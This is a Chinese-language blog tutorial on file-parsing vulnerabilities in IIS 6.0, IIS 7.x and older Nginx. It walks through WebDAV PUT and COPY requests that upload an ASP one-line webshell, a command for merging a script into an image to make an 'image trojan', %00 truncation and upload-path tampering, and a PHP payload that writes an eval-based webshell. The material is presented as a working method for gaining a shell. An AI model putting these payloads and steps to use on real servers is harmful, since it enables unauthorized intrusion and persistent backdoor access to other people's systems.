• 关于解析漏洞


    IIS6.0 解析漏洞

    1.在网站目录中如果存在名为*.asp、*asa的目录,那么该目录下内的任何文件都会被解析成asp文件被执行。

    2.再上传图片木马的时候,将文件名改为*.asp;,jpg,该文件文件都会被IIS解析为asp文件执行。

    3.还有IIS6.0 默认的可执行文件除了asp还包含这三种/wooyun.cer、/wooyun.asa、/wooyun.cdx

    4.(转载)WebDav漏洞(对IIS写权限的利用,这个我们在之前学http请求的时候就说过的请求头和正文语句,这段好好看)

    • 第一步,通过OPTIONS探测服务器所支持的HTTP方法

    请求:

    OPTIONS / HTTP/1.1

    Host:www.example.com

    响应:

    Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH

    • 第二步,通过PUT方法向服务器上传脚本文件

    请求:

    PUT /a.txt HTTP/1.1

    Host:www.example.com

    Content-Length:30

    <%eval request("chopper")%>

    第三步,通过Move或Copy方法改名

    请求:

    COPY /a.txt HTTP/1.1

    Host:www.example.com

    Destination:http://www.example.com/cmd.asp

    第四步,使用DELETE方法,攻击者还可以删除服务器上的任意文件

    请求:

    DELETE /a.txt HTTP/1.1

    Host:www.example.com

    5.当你上传的木马如asp/aspx,必须在IIS6.0环境,且在以x.asp为名称的文件夹下面,才能执行图片里的代码,也就是说,图片木马执行必须满足2个条件:A:有x.asp文件夹;B:图片木马在x.asp文件夹下,那么怎么去达到这种目的就需要奇艺技巧了,常见的是通过%00截断和一些个更改上传时候的属性。(下面会讲到)

    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------

    图片木马制作方法

    使用CMD制作一句话木马。

    参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件

    参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件

    copy 1.jpg/b+1.php 2.jpg

    //意思是将1.jpg以二进制与1.php合并成2.jpg

    那么2.jpg就是图片木马了。

    --------------------------------------------------------------------------------------------------

    查看数据包,其中Content-Disposition:form-data;name=”path”下面的一行为服务保存文件的相对路径,我们把原本的 uploadimg/ 改为 uploadimg/1.php;

    ---------------------------------------------------------------------------------------------------

    截断上传,是借助%00截断上传使%00后面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,从而成功上传shell。

    ---------------------------------------------------------------------------------------------------

    二、IIS7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

    找到使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。

    在图片格式后面添加xx.jpg/. php随便你怎么填。只要后缀为.php就好。如(http://192.168.1.1/upload/1.jpg/.php)

    <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问sp.jpg/.php,在这个目录下就会生成一句话木马 shell.php
  • 相关阅读:
    继承和派生
    面向过程和面向对象 , 面向对象基础
    numpy模块、matplotlib模块、pandas模块
    包 ,模块(time、datetime、random、hashlib、typing、requests、re)
    os模块 sys模块 json/pickle 模块 logging模块
    python模块基础
    匿名函数 python内置方法(max/min/filter/map/sorted/reduce)面向过程编程
    最简单的注册美区Apple ID方法
    迭代器 生成器 函数递归
    ODBC连接时报错不可识别的数据库格式
  • 原文地址:https://www.cnblogs.com/52xuege/p/9460381.html
Copyright © 2020-2023  润新知